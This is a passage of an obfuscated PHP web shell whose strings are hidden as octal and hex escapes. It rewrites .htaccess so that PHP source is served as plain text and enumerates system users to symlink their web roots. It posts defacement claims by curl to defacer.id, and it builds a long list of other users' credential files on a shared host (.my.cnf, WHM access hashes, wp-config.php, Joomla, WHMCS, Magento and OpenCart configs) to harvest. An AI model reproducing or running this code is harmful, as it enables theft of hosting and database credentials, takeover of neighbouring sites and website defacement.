"\12\40\x4f\x70\164\x69\x6f\x6e\x73\x20\111\x6e\144\145\x78\x65\163\40\x46\x6f\x6c\154\x6f\x77\123\x79\155\x4c\x69\x6e\153\163\12\104\x69\x72\x65\x63\164\157\162\171\x49\156\x64\145\170\x20\152\141\156\x63\157\170\56\150\164\x6d\12\x41\144\x64\124\x79\x70\x65\40\x74\x65\170\x74\x2f\160\x6c\x61\151\156\x20\56\x70\x68\x70\40\xa\101\144\144\x48\141\156\144\x6c\x65\x72\40\164\x65\170\164\x2f\x70\x6c\x61\x69\x6e\40\x2e\160\150\x70\xa\x53\x61\164\151\163\x66\171\40\x41\156\171\xa"; $fp3 = fopen("\56\x68\164\141\x63\x63\145\163\x73", "\x77"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\xa\40\x3c\144\151\166\x20\143\x6c\x61\x73\x73\x3d\x27\x6d\x79\142\157\170\x27\x3e\x3c\150\62\40\x63\154\141\163\x73\75\x27\153\x32\154\154\63\x33\x64\62\x27\x3e\163\x65\162\x76\x65\162\x20\x73\x79\155\x6c\151\x6e\153\x65\x72\74\x2f\150\62\76\12\40\74\164\x61\x62\x6c\145\x20\141\154\151\x67\156\75\143\145\x6e\164\x65\162\x20\x62\157\x72\144\x65\162\x3d\61\x3e\74\164\162\x3e\xa\x20\74\x74\x64\40\x61\x6c\x69\x67\156\x3d\x63\145\x6e\164\145\x72\76\x3c\x66\157\x6e\164\40\163\x69\x7a\x65\x3d\63\76\x49\x44\74\57\x66\x6f\x6e\164\76\74\x2f\164\144\x3e\xa\x20\x3c\164\144\x20\x61\154\151\x67\x6e\75\143\x65\x6e\x74\145\162\x3e\x3c\x66\157\156\x74\40\163\151\172\x65\x3d\63\76\125\x73\145\162\x73\74\57\146\x6f\x6e\x74\x3e\x3c\x2f\164\144\76\xa\40\74\x74\x64\40\141\x6c\151\x67\x6e\75\x63\145\156\164\145\162\x3e\x3c\x66\157\156\164\x20\x73\151\172\145\75\x33\76\123\171\x6d\x6c\151\x6e\153\74\57\146\x6f\x6e\x74\x3e\74\57\164\x64\x3e\x3c\x2f\x74\162\x3e"; $temp = ''; $val1 = 0; $val2 = 1000; for (; $val1 <= $val2; $val1++) { $uid = @posix_getpwuid($val1); if ($uid) { $temp .= join("\72", $uid) . "\12"; } } echo "\74\x62\x72\57\x3e"; $temp = trim($temp); $file5 = fopen("\164\x65\x73\164\56\164\170\x74", "\167"); fputs($file5, $temp); fclose($file5); $dcount = 1; $file = fopen("\164\x65\x73\x74\56\164\170\164", "\x72") or die("\125\x6e\x61\142\x6c\x65\40\164\x6f\x20\157\x70\145\156\40\146\151\x6c\145\x21"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match("\57\134\57\x28\56\52\x3f\x29\134\x3a\134\57\57\163", $s, $matches); $matches = str_replace("\150\x6f\155\x65\57", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "\142\151\156" || $matches == "\145\164\x63\x2f\130\61\x31\x2f\x66\x73" || $matches == "\166\141\x72\57\x6c\x69\x62\x2f\156\x66\x73" || $matches == "\166\x61\162\x2f\x61\162\160\167\141\x74\x63\150" || $matches == "\166\x61\162\57\x67\x6f\160\x68\x65\162" || $matches == "\163\x62\x69\x6e" || $matches == "\166\x61\162\x2f\x61\144\x6d" || $matches == "\165\x73\x72\57\147\141\155\x65\163" || $matches == "\x76\x61\x72\x2f\146\x74\160" || $matches == "\x65\x74\143\57\x6e\164\x70" || $matches == "\166\x61\162\57\x77\167\x77" || $matches == "\166\x61\x72\x2f\156\x61\x6d\145\144") { continue; } echo "\x3c\164\162\76\74\x74\144\x20\x61\x6c\x69\147\x6e\75\x63\145\x6e\x74\145\162\x3e\74\x66\x6f\x6e\x74\x20\x73\x69\x7a\145\x3d\x32\76" . $dcount . "\74\x2f\x74\144\x3e\xa\x20\74\164\x64\40\x61\154\x69\147\156\75\x63\145\x6e\164\145\x72\x3e\x3c\146\157\x6e\164\x20\x63\x6c\x61\163\163\x3d\164\x78\164\76" . $matches . "\74\57\164\144\76"; echo "\x3c\164\144\40\141\154\x69\147\156\x3d\143\x65\156\164\145\162\x3e\74\x66\x6f\x6e\x74\40\x63\154\141\x73\163\x3d\164\x78\x74\76\74\x61\x20\x68\162\x65\x66\x3d{$full}\x2f\x63\157\x78\x5f\163\x79\x6d\x2f\162\157\157\x74\x2f\150\157\155\x65\57" . $matches . "\x2f\160\x75\x62\154\x69\143\x5f\150\x74\155\154\x20\164\x61\162\x67\145\164\x3d\47\x5f\x62\154\x61\156\x6b\x27\76\123\x79\155\x6c\151\156\153\x3c\x2f\x61\x3e\x3c\x2f\164\144\x3e\74\57\x74\162\76"; $dcount++; } fclose($file); echo "\74\57\x74\141\x62\154\145\76\x3c\57\x64\x69\166\76\x3c\x2f\143\145\156\x74\145\162\76"; unlink("\164\x65\x73\x74\x2e\164\x78\164"); } else { echo "\74\x63\x65\x6e\x74\145\162\x3e\74\x66\x6f\156\164\40\163\151\x7a\x65\75\x33\x3e\x43\141\156\156\157\164\x20\x63\162\145\141\x74\145\40\x53\171\x6d\x6c\151\156\153\74\57\x66\157\x6e\x74\x3e\74\57\x63\x65\x6e\164\145\x72\x3e"; } } } } elseif ($_GET["\x64\157"] == "\x64\145\x66\x61\143\145\162\151\144") { echo "\x3c\x63\145\x6e\164\x65\x72\76\74\x66\x6f\162\x6d\40\155\x65\x74\150\x6f\144\75\x27\x70\157\x73\164\x27\76\xa\11\11\74\x75\x3e\104\145\x66\141\143\x65\162\74\57\165\x3e\72\x20\74\x62\x72\x3e\xa\11\11\74\151\x6e\160\x75\164\40\x74\171\x70\x65\x3d\x27\x74\x65\170\x74\47\x20\156\x61\155\145\75\47\x68\145\x6b\145\x6c\x27\x20\x73\151\x7a\145\x3d\47\65\60\x27\40\x76\141\154\165\x65\47\123\x75\144\x6f\x20\x46\x61\x6d\x69\154\171\x27\76\74\142\x72\76\12\x9\11\x3c\165\x3e\x54\x65\x61\x6d\x3c\57\x75\76\72\40\x3c\x62\162\76\xa\11\x9\74\x69\156\160\165\164\x20\x74\171\160\x65\75\47\164\x65\170\x74\x27\x20\x6e\141\x6d\x65\75\x27\164\x69\x6d\47\x20\x73\x69\x7a\x65\75\47\65\60\x27\x20\166\141\154\165\x65\75\x27\x45\170\x74\162\145\x6d\x65\40\103\162\x65\x77\47\76\x3c\x62\162\76\12\11\11\x3c\x75\76\x44\x6f\x6d\x61\151\x6e\x73\74\x2f\165\76\72\x20\x3c\142\x72\76\12\11\11\74\x74\x65\170\x74\141\162\145\141\x20\x73\x74\x79\154\x65\x3d\x27\167\151\x64\x74\x68\72\x20\x34\x35\x30\160\x78\x3b\40\x68\145\x69\147\150\x74\72\x20\61\65\60\160\x78\73\47\x20\x6e\141\155\x65\x3d\x27\x73\151\164\145\x73\47\x3e\74\x2f\x74\145\x78\x74\x61\x72\x65\141\x3e\74\142\162\76\12\11\11\x3c\151\156\x70\x75\x74\x20\x74\171\160\x65\x3d\x27\x73\x75\142\155\151\x74\47\40\156\141\155\145\x3d\47\x67\x6f\x27\40\x76\141\x6c\x75\145\75\47\x53\165\x62\155\151\164\x27\x20\163\x74\x79\x6c\x65\x3d\x27\167\151\x64\164\x68\72\40\64\x35\60\160\x78\73\47\76\12\11\x9\x3c\57\x66\x6f\x72\x6d\76"; $site = explode("\15\12", $_POST["\163\x69\x74\x65\x73"]); $go = $_POST["\x67\157"]; $hekel = $_POST["\x68\x65\x6b\145\x6c"]; $tim = $_POST["\164\x69\x6d"]; if ($go) { foreach ($site as $sites) { $zh = $sites; $form_url = "\x68\x74\164\x70\x73\72\57\x2f\167\x77\x77\56\144\x65\x66\141\143\x65\162\x2e\x69\144\57\x6e\157\x74\151\146\171"; $data_to_post = array(); $data_to_post["\x61\x74\x74\141\143\x6b\x65\x72"] = "{$hekel}"; $data_to_post["\164\145\141\155"] = "{$tim}"; $data_to_post["\x70\157\143"] = "\123\121\114\x20\111\156\152\145\143\x74\151\x6f\x6e"; $data_to_post["\x75\x72\x6c"] = "{$zh}"; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $form_url); curl_setopt($curl, CURLOPT_POST, sizeof($data_to_post)); curl_setopt($curl, CURLOPT_USERAGENT, "\115\x6f\x7a\x69\154\154\141\x2f\x34\x2e\x30\40\50\143\157\x6d\160\x61\x74\x69\142\x6c\x65\73\x20\x4d\123\x49\x45\40\66\x2e\60\x3b\x20\x57\x69\156\144\157\167\163\40\x4e\124\40\65\x2e\61\x3b\40\123\126\61\73\x20\56\x4e\x45\x54\40\103\x4c\122\40\x31\56\x31\56\x34\63\x32\62\73\40\x2e\x4e\x45\x54\40\103\x4c\122\40\x32\x2e\x30\x2e\65\60\x37\62\x37\51"); curl_setopt($curl, CURLOPT_POSTFIELDS, $data_to_post); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_REFERER, "\x68\164\164\x70\163\x3a\57\x2f\144\145\146\x61\143\x65\x72\x2e\151\144\x2f\156\x6f\x74\151\x66\x79\56\150\x74\155\154"); $result = curl_exec($curl); echo $result; curl_close($curl); echo "\74\x62\162\x3e"; } } } elseif ($_GET["\144\157"] == "\x63\157\x6e\x66\x69\147") { if ($_POST) { $passwd = $_POST["\160\141\x73\x73\167\144"]; mkdir("\x63\x6f\170\137\x63\x6f\x6e\x66\x69\147", 511); $isi_htc = "\x4f\x70\164\x69\x6f\156\163\40\x61\154\154\xa\122\145\161\165\x69\x72\145\x20\x4e\157\x6e\145\12\123\x61\164\151\163\146\x79\40\101\156\x79"; $htc = fopen("\143\157\x78\x5f\x63\x6f\x6e\146\x69\147\57\x2e\x68\164\141\143\143\x65\x73\163", "\x77"); fwrite($htc, $isi_htc); preg_match_all("\57\x28\x2e\x2a\77\51\72\x78\72\57", $passwd, $user_config); foreach ($user_config[1] as $user_cox) { $user_config_dir = "\x2f\150\x6f\x6d\145\x2f{$user_cox}\57\x70\165\142\x6c\x69\143\137\x68\164\155\154\x2f"; if (is_readable($user_config_dir)) { $grab_config = array("\57\150\157\x6d\x65\57{$user_cox}\x2f\56\x6d\x79\x2e\x63\156\x66" => "\x63\160\141\x6e\x65\x6c", "\57\150\157\155\x65\x2f{$user_cox}\57\56\141\x63\143\x65\163\163\x68\x61\x73\150" => "\x57\110\x4d\x2d\x61\143\x63\x65\x73\163\x68\x61\x73\150", "\x2f\150\x6f\155\x65\57{$user_cox}\57\x70\x75\142\154\151\143\x5f\150\164\155\154\57\x62\x77\55\143\x6f\156\x66\x69\x67\x73\57\143\x6f\x6e\146\151\147\x2e\151\x6e\151" => "\x42\x6f\163\x57\x65\x62", "\57\x68\x6f\155\x65\x2f{$user_cox}\57\160\x75\x62\154\151\x63\x5f\150\x74\x6d\x6c\57\143\x6f\156\146\x69\147\57\x6b\x6f\156\x65\153\163\x69\x2e\x70\x68\x70" => "\114\157\x6b\157\x6d\x65\x64\151\141", "\57\150\x6f\x6d\145\57{$user_cox}\x2f\x70\x75\x62\154\x69\143\x5f\x68\164\155\154\57\154\157\x6b\x6f\x6d\x65\x64\x69\141\57\143\x6f\x6e\146\x69\x67\x2f\x6b\x6f\x6e\145\x6b\x73\x69\56\160\x68\160" => "\x4c\x6f\x6b\x6f\155\145\x64\x69\141", "\57\150\x6f\x6d\x65\x2f{$user_cox}\57\x70\165\x62\154\151\x63\x5f\x68\164\155\x6c\x2f\x63\154\151\x65\156\164\141\x72\145\141\57\143\157\156\146\151\x67\165\x72\x61\x74\151\157\156\56\160\x68\160" => "\127\110\x4d\x43\x53", "\x2f\150\157\155\x65\57{$user_cox}\x2f\160\x75\x62\x6c\x69\x63\x5f\150\x74\155\x6c\57\167\x68\x6d\143\x73\57\143\157\x6e\x66\151\x67\x75\x72\x61\x74\x69\x6f\x6e\56\160\150\x70" => "\x57\x48\x4d\x43\123", "\57\x68\157\x6d\x65\x2f{$user_cox}\x2f\x70\x75\x62\x6c\x69\x63\x5f\150\x74\x6d\x6c\x2f\x66\x6f\162\165\155\57\x63\157\156\146\x69\x67\56\x70\x68\160" => "\160\150\x70\x42\x42", "\57\150\x6f\155\x65\57{$user_cox}\57\x70\165\x62\x6c\151\143\137\x68\164\155\x6c\57\163\x69\x74\145\163\57\x64\145\146\x61\165\154\x74\57\163\145\x74\x74\x69\156\x67\x73\56\x70\150\x70" => "\x44\162\x75\x70\141\x6c", "\57\x68\x6f\155\145\57{$user_cox}\x2f\160\x75\x62\x6c\x69\143\x5f\150\x74\155\154\57\143\157\156\x66\x69\x67\57\x73\x65\x74\x74\x69\x6e\x67\163\x2e\x69\156\143\x2e\x70\x68\x70" => "\120\162\145\x73\x74\141\123\x68\x6f\x70", "\x2f\x68\x6f\x6d\145\x2f{$user_cox}\x2f\x70\x75\x62\154\x69\143\137\150\x74\x6d\x6c\x2f\x61\x70\160\x2f\x65\164\x63\57\x6c\157\143\x61\x6c\56\170\155\x6c" => "\x4d\x61\x67\x65\156\164\157", "\57\150\x6f\155\145\x2f{$user_cox}\x2f\160\x75\x62\x6c\x69\x63\x5f\150\164\155\154\x2f\141\144\155\151\156\x2f\143\x6f\156\x66\151\x67\x2e\160\x68\160" => "\117\x70\x65\x6e\103\x61\162\x74", "\x2f\150\x6f\x6d\x65\x2f{$user_cox}\x2f\x70\165\x62\154\151\143\x5f\x68\164\x6d\154\x2f\163\154\143\157\x6e\146\151\147\56\x70\x68\160" => "\123\x69\x74\145\x6c\x6f\x6b", "\57\150\x6f\x6d\x65\x2f{$user_cox}\57\160\165\142\x6c\x69\143\137\x68\x74\155\x6c\57\x61\x70\160\154\151\x63\141\164\151\x6f\x6e\x2f\x63\157\156\146\151\x67\57\x64\141\164\x61\142\141\x73\145\x2e\160\150\160" => "\x45\x6c\154\151\163\x6c\x61\142", "\57\150\x6f\155\145\57{$user_cox}\x2f\x70\x75\142\154\x69\143\x5f\x68\x74\155\x6c\57\x77\150\155\57\143\157\x6e\x66\x69\x67\165\x72\141\x74\x69\157\x6e\56\x70\150\160" => "\127\x48\x4d\x43\123", "\57\150\x6f\155\145\57{$user_cox}\x2f\x70\x75\x62\154\151\x63\x5f\x68\x74\155\x6c\57\x77\150\155\x63\x2f\127\x48\115\57\x63\x6f\156\146\x69\x67\165\162\141\164\x69\157\x6e\x2e\160\x68" => "\x57\110\115\103", "\57\150\x6f\x6d\145\57{$user_cox}\57\160\165\142\154\x69\x63\137\150\164\155\154\57\143\145\156\164\162\x61\154\57\143\157\156\146\151\147\x75\x72\141\x74\151\157\156\56\x70\x68\160" => "\127\x48\115\x20\x43\x65\x6e\x74\x72\141\154", "\57\150\x6f\x6d\x65\x2f{$user_cox}\x2f\160\165\142\x6c\x69\143\x5f\x68\x74\155\154\x2f\x77\150\x6d\57\x57\x48\x4d\103\123\57\143\157\156\x66\151\147\165\162\x61\x74\151\x6f\156\x2e\x70\x68\160" => "\127\110\115\103\123", "\x2f\x68\157\x6d\x65\57{$user_cox}\57\160\165\x62\154\151\x63\x5f\x68\164\x6d\154\57\x77\x68\155\x2f\167\150\x6d\x63\x73\x2f\143\x6f\x6e\x66\x69\147\x75\x72\141\164\x69\x6f\156\x2e\160\x68\160" => "\127\110\115\103\123", "\57\x68\x6f\155\x65\57{$user_cox}\57\160\165\142\x6c\151\x63\137\150\164\x6d\x6c\57\163\165\x62\x6d\151\164\164\151\x63\x6b\x65\x74\56\160\x68\x70" => "\127\x48\x4d\x43\123", "\x2f\150\157\155\x65\57{$user_cox}\57\160\165\142\x6c\x69\143\x5f\x68\x74\x6d\154\57\x63\x6f\156\146\x69\x67\x75\x72\141\164\151\157\x6e\x2e\160\x68\160" => "\112\x6f\157\x6d\x6c\141", "\57\x68\157\x6d\145\x2f{$user_cox}\57\x70\165\x62\x6c\151\143\x5f\150\164\155\154\x2f\112\x6f\x6f\x6d\154\141\57\143\x6f\x6e\146\151\147\x75\162\141\x74\x69\157\156\x2e\160\x68\160" => "\112\x6f\157\x6d\154\x61\x4a\x6f\157\155\154\141", "\x2f\150\x6f\155\x65\57{$user_cox}\x2f\160\165\x62\x6c\x69\x63\x5f\150\x74\x6d\154\57\152\157\157\155\x6c\141\x2f\x63\x6f\156\146\151\x67\x75\162\x61\x74\x69\157\156\x2e\160\150\x70" => "\x4a\x6f\x6f\x6d\154\141\112\x6f\x6f\x6d\x6c\x61", "\57\x68\x6f\155\145\x2f{$user_cox}\57\160\165\x62\154\151\x63\137\x68\x74\x6d\154\57\x4a\117\117\115\x4c\101\x2f\x63\x6f\156\x66\151\x67\x75\162\141\x74\151\157\x6e\x2e\x70\x68\160" => "\112\157\157\x6d\x6c\x61\112\x6f\157\155\x6c\141", "\x2f\150\x6f\x6d\x65\x2f{$user_cox}\x2f\160\165\142\154\151\143\x5f\x68\164\x6d\154\57\x48\x6f\x6d\x65\x2f\143\157\x6e\x66\x69\x67\165\162\x61\x74\151\x6f\156\56\160\x68\x70" => "\x4a\157\x6f\155\154\141\x48\x6f\x6d\x65", "\57\x68\157\155\x65\57{$user_cox}\57\160\x75\142\154\151\x63\137\150\x74\x6d\x6c\57\110\117\115\105\x2f\x63\x6f\x6e\x66\151\x67\x75\x72\x61\164\x69\x6f\156\x2e\x70\x68\160" => "\x4a\x6f\157\x6d\154\x61\110\157\x6d\145", "\x2f\x68\157\155\145\57{$user_cox}\x2f\x70\x75\x62\154\x69\143\137\x68\164\155\x6c\x2f\150\x6f\x6d\145\x2f\143\x6f\x6e\x66\x69\x67\165\x72\x61\x74\x69\157\156\56\160\x68\x70" => "\112\x6f\x6f\155\154\x61\x48\157\155\145", "\x2f\x68\157\x6d\x65\x2f{$user_cox}\57\160\x75\x62\154\151\143\x5f\150\x74\155\154\57\116\x45\x57\x2f\x63\x6f\x6e\x66\151\x67\x75\x72\x61\x74\x69\157\x6e\x2e\160\150\x70" => "\x4a\x6f\x6f\x6d\x6c\x61\x4e\x65\x77", "\57\150\x6f\x6d\x65\57{$user_cox}\x2f\160\x75\x62\x6c\x69\x63\x5f\x68\x74\155\154\x2f\x4e\145\167\x2f\143\x6f\156\x66\151\x67\x75\x72\141\x74\151\157\x6e\56\160\150\x70" => "\112\x6f\157\155\154\141\116\145\167", "\x2f\150\x6f\x6d\x65\x2f{$user_cox}\57\160\165\142\x6c\x69\x63\x5f\x68\164\x6d\x6c\57\156\145\167\x2f\x63\x6f\x6e\146\151\147\x75\162\x61\x74\x69\157\156\56\x70\x68\160" => "\x4a\157\157\155\x6c\x61\x4e\x65\167", "\57\150\x6f\155\145\57{$user_cox}\x2f\160\165\142\154\151\143\137\150\x74\x6d\154\x2f\x4e\145\167\163\x2f\x63\157\156\x66\151\x67\165\x72\141\x74\151\x6f\156\x2e\x70\150\160" => "\112\x6f\157\155\154\141\x4e\x65\167\x73", "\57\x68\x6f\155\145\x2f{$user_cox}\57\x70\165\x62\154\x69\x63\137\x68\164\155\154\57\x4e\x45\x57\123\x2f\143\x6f\156\x66\x69\x67\165\162\141\x74\x69\x6f\156\56\160\150\x70" => "\112\x6f\x6f\x6d\154\141\x4e\x65\x77\x73", "\57\x68\157\x6d\145\x2f{$user_cox}\x2f\x70\x75\142\154\x69\143\x5f\150\x74\155\x6c\x2f\x6e\x65\167\163\57\143\157\x6e\x66\151\147\165\162\141\164\x69\x6f\156\56\160\150\160" => "\x4a\157\x6f\x6d\154\141\116\x65\167\x73", "\57\x68\x6f\155\145\57{$user_cox}\57\x70\x75\142\x6c\x69\x63\137\150\164\155\154\57\103\x6d\x73\57\143\x6f\x6e\146\151\x67\165\162\x61\164\151\x6f\x6e\x2e\160\150\x70" => "\112\157\x6f\155\154\141\103\155\x73", "\57\x68\157\x6d\145\x2f{$user_cox}\57\x70\165\142\154\151\143\137\x68\x74\x6d\x6c\57\x43\115\x53\57\x63\x6f\x6e\x66\x69\147\x75\162\141\x74\x69\x6f\156\56\160\150\160" => "\112\157\x6f\155\154\141\103\x6d\163", "\x2f\150\157\x6d\x65\57{$user_cox}\x2f\x70\165\142\154\151\143\137\x68\164\155\x6c\57\143\x6d\x73\57\x63\x6f\x6e\x66\x69\147\x75\162\x61\164\151\157\156\x2e\160\x68\160" => "\x4a\x6f\157\x6d\x6c\141\103\x6d\163", "\x2f\x68\157\x6d\x65\57{$user_cox}\x2f\x70\165\142\x6c\151\143\137\x68\164\155\154\x2f\115\x61\151\x6e\57\143\157\156\x66\x69\147\165\x72\141\x74\x69\157\156\56\160\150\160" => "\112\157\157\x6d\154\141\x4d\x61\151\x6e", "\x2f\x68\157\155\x65\57{$user_cox}\x2f\x70\165\142\154\x69\143\x5f\x68\x74\155\x6c\x2f\115\101\x49\116\x2f\x63\x6f\x6e\x66\151\147\165\162\141\x74\151\x6f\x6e\56\x70\x68\160" => "\112\x6f\157\155\x6c\x61\x4d\141\x69\156", "\57\x68\157\155\x65\x2f{$user_cox}\57\x70\x75\x62\154\151\x63\137\150\164\155\154\x2f\155\141\151\x6e\57\x63\x6f\x6e\x66\151\x67\165\162\x61\164\151\157\x6e\x2e\x70\150\160" => "\x4a\x6f\x6f\x6d\154\141\115\x61\151\x6e", "\57\x68\157\x6d\x65\x2f{$user_cox}\57\160\165\x62\x6c\151\143\137\150\164\x6d\154\57\x42\154\x6f\147\x2f\143\157\156\146\151\x67\x75\x72\141\164\x69\157\x6e\56\160\x68\160" => "\112\x6f\157\155\154\141\x42\154\157\x67", "\x2f\x68\157\x6d\145\x2f{$user_cox}\57\160\x75\x62\154\x69\143\137\150\164\x6d\x6c\x2f\x42\114\x4f\x47\57\x63\x6f\156\146\x69\147\x75\162\x61\164\151\157\156\56\160\x68\160" => "\112\157\x6f\155\154\141\102\154\157\147", "\x2f\150\157\155\x65\x2f{$user_cox}\x2f\160\165\x62\x6c\x69\143\x5f\150\164\x6d\x6c\57\x62\x6c\x6f\x67\57\143\x6f\156\x66\x69\147\x75\162\x61\x74\151\157\x6e\56\x70\x68\x70" => "\x4a\157\x6f\155\154\x61\102\x6c\157\147", "\57\150\x6f\155\145\x2f{$user_cox}\57\x70\165\x62\154\151\x63\x5f\150\x74\x6d\x6c\57\102\x6c\157\147\x73\57\x63\x6f\x6e\146\x69\147\165\162\141\164\151\157\156\56\x70\x68\x70" => "\x4a\x6f\x6f\x6d\154\x61\102\x6c\x6f\x67\163", "\57\x68\x6f\155\145\x2f{$user_cox}\57\160\x75\142\x6c\151\x63\x5f\150\164\x6d\154\x2f\x42\x4c\x4f\107\x53\x2f\143\x6f\x6e\x66\x69\x67\x75\162\x61\164\151\157\x6e\56\x70\x68\160" => "\112\x6f\157\x6d\154\x61\102\154\x6f\x67\x73", "\x2f\150\x6f\155\x65\57{$user_cox}\x2f\x70\165\142\154\151\143\137\150\x74\x6d\x6c\x2f\x62\154\157\x67\163\x2f\x63\157\x6e\x66\x69\x67\x75\x72\x61\x74\151\157\x6e\x2e\x70\150\160" => "\x4a\x6f\x6f\155\154\141\102\x6c\x6f\147\163", "\57\150\157\x6d\x65\57{$user_cox}\x2f\160\x75\142\154\x69\x63\x5f\x68\x74\155\154\x2f\142\x65\x74\141\x2f\143\x6f\x6e\x66\x69\x67\165\x72\141\x74\151\157\x6e\x2e\160\x68\160" => "\112\x6f\157\x6d\154\141\102\x65\x74\x61", "\57\150\157\155\x65\57{$user_cox}\x2f\x70\x75\142\154\x69\x63\x5f\150\x74\155\x6c\57\102\x65\x74\x61\57\143\157\x6e\x66\x69\x67\x75\x72\141\x74\151\x6f\156\56\160\150\x70" => "\112\x6f\157\155\x6c\x61\102\x65\x74\141", "\x2f\150\157\155\x65\x2f{$user_cox}\57\x70\x75\142\x6c\x69\143\x5f\x68\x74\x6d\154\57\x42\x45\x54\x41\57\143\x6f\156\146\151\x67\165\162\x61\164\x69\x6f\x6e\x2e\160\150\160" => "\x4a\x6f\x6f\155\154\141\x42\145\164\x61", "\57\150\x6f\155\x65\57{$user_cox}\57\160\x75\142\x6c\x69\143\137\150\164\x6d\154\57\120\122\x45\123\x53\x2f\x63\157\x6e\x66\x69\x67\165\162\x61\164\151\157\156\56\160\x68\x70" => "\112\x6f\157\155\154\x61\120\162\145\x73\x73", "\x2f\150\x6f\155\145\57{$user_cox}\57\160\x75\142\x6c\x69\143\137\150\164\155\x6c\57\x50\x72\145\x73\x73\57\143\x6f\156\146\x69\147\x75\x72\x61\164\x69\157\156\56\x70\x68\160" => "\x4a\x6f\157\155\154\x61\x50\x72\x65\163\163", "\57\x68\157\x6d\x65\57{$user_cox}\x2f\x70\x75\142\154\x69\143\137\x68\x74\155\154\x2f\160\x72\145\163\163\x2f\143\x6f\x6e\146\x69\x67\165\162\x61\x74\x69\157\x6e\x2e\x70\150\160" => "\112\x6f\157\155\154\x61\120\x72\x65\163\163", "\x2f\x68\157\x6d\145\x2f{$user_cox}\x2f\160\165\x62\154\151\x63\137\150\164\155\x6c\57\127\x70\x2f\x63\157\156\146\x69\x67\x75\162\141\164\151\157\156\56\x70\x68\160" => "\112\x6f\157\155\x6c\x61\127\160", "\x2f\150\157\x6d\x65\57{$user_cox}\x2f\160\165\142\x6c\x69\143\x5f\150\164\x6d\x6c\57\x77\160\x2f\x63\157\x6e\146\151\x67\x75\x72\141\164\151\x6f\x6e\56\160\150\x70" => "\x4a\x6f\x6f\x6d\154\141\x57\160", "\57\150\x6f\x6d\145\57{$user_cox}\x2f\x70\x75\142\x6c\151\143\x5f\150\164\x6d\x6c\x2f\x57\120\57\143\x6f\x6e\146\x69\x67\x75\162\x61\164\151\157\x6e\x2e\x70\150\x70" => "\112\x6f\x6f\x6d\x6c\141\127\120", "\57\150\157\x6d\x65\57{$user_cox}\x2f\x70\x75\x62\x6c\151\143\x5f\150\x74\155\154\x2f\160\157\x72\x74\x61\154\x2f\143\x6f\x6e\x66\151\x67\x75\162\141\x74\151\x6f\156\56\160\x68\x70" => "\112\x6f\157\x6d\x6c\x61\120\x6f\162\x74\141\154", "\57\150\x6f\155\x65\x2f{$user_cox}\57\x70\x75\142\x6c\151\143\x5f\150\164\x6d\154\57\120\117\122\x54\101\114\x2f\143\x6f\x6e\146\x69\x67\x75\x72\141\164\x69\x6f\156\56\160\x68\160" => "\112\x6f\157\x6d\x6c\141\120\157\162\164\141\x6c", "\57\150\157\155\x65\57{$user_cox}\x2f\160\x75\142\154\x69\143\x5f\x68\x74\x6d\x6c\57\x50\x6f\x72\164\141\154\x2f\x63\157\156\146\x69\147\x75\x72\x61\164\x69\157\x6e\x2e\x70\x68\x70" => "\x4a\x6f\157\x6d\154\141\x50\x6f\162\164\141\154", "\x2f\x68\157\x6d\x65\57{$user_cox}\x2f\160\x75\142\154\151\x63\x5f\x68\x74\155\154\x2f\x77\x70\x2d\143\157\156\146\x69\147\x2e\x70\150\160" => "\127\157\162\x64\x50\162\145\163\163", "\57\x68\157\x6d\x65\57{$user_cox}\x2f\160\x75\x62\154\151\143\137\150\164\155\x6c\57\x77\157\162\x64\x70\x72\145\163\163\57\167\160\x2d\143\157\x6e\x66\x69\x67\x2e\160\x68\160" => "\127\157\162\x64\x50\162\145\x73\163\x57\x6f\x72\x64\160\162\x65\x73\x73", "\x2f\150\157\155\x65\x2f{$user_cox}\57\160\165\142\154\151\x63\137\150\x74\155\154\57\x57\x6f\x72\144\160\162\145\x73\x73\57\167\160\x2d\x63\157\156\146\151\147\56\x70\150\x70" => "\127\157\162\x64\x50\x72\x65\x73\163\127\x6f\x72\144\x70\162\x65\163\x73", "\x2f\x68\157\155\145\57{$user_cox}\57\x70\165\x62\x6c\x69\143\x5f\x68\x74\x6d\154\x2f\x57\x4f\x52\x44\x50\x52\x45\123\x53\57\167\x70\x2d\x63\x6f\156\x66\151\x67\56\160\150\160" => "\127\x6f\x72\x64\x50\162\145\x73\x73\x57\x6f\162\144\160\x72\x65\x73\163", "\57\150\x6f\155\145\57{$user_cox}\57\x70\x75\x62\154\x69\143\137\x68\x74\155\154\57\110\x6f\x6d\x65\x2f\x77\160\x2d\143\157\x6e\146\151\x67\56\160\x68\x70" => "\x57\x6f\162\x64\x50\x72\145\x73\x73\110\157\155\x65", "\x2f\150\157\155\145\x2f{$user_cox}\x2f\x70\x75\x62\154\x69\x63\137\x68\x74\155\x6c\57\110\x4f\115\x45\57\x77\x70\x2d\143\x6f\156\x66\151\x67\x2e\x70\x68\x70" => "\127\157\162\144\120\162\145\163\163\110\x6f\x6d\145", "\x2f\150\x6f\x6d\145\57{$user_cox}\57\160\x75\142\x6c\151\x63\137\150\x74\x6d\x6c\57\x68\x6f\155\x65\57\x77\x70\55\143\157\156\146\151\x67\56\160\150\160" => "\x57\x6f\x72\x64\120\x72\145\x73\163\x48\x6f\x6d\145", "\57\150\157\x6d\145\x2f{$user_cox}\x2f\160\165\x62\x6c\x69\143\137\150\164\155\154\57\116\x45\127\x2f\x77\x70\55\x63\157\x6e\x66\151\147\56\160\x68\160" => "\127\x6f\162\144\x50\162\x65\163\163\x4e\x65\x77", "\x2f\150\157\x6d\x65\x2f{$user_cox}\57\x70\x75\142\x6c\x69\143\137\x68\164\x6d\154\x2f\116\145\x77\x2f\x77\x70\x2d\x63\157\156\146\151\x67\x2e\160\x68\x70" => "\x57\x6f\162\144\120\162\145\x73\163\116\145\167", "\x2f\x68\157\x6d\145\57{$user_cox}\x2f\x70\165\142\x6c\x69\143\x5f\150\164\155\154\x2f\x6e\x65\167\57\x77\x70\55\x63\157\156\146\151\147\x2e\x70\x68\x70" => "\127\157\x72\144\120\x72\x65\x73\x73\x4e\x65\167", "\x2f\150\x6f\155\145\x2f{$user_cox}\57\160\x75\142\x6c\x69\143\x5f\x68\164\155\154\57\x4e\145\167\163\57\x77\x70\55\x63\x6f\x6e\x66\x69\x67\56\160\x68\160" => "\127\x6f\162\x64\x50\162\x65\x73\x73\116\x65\167\x73", 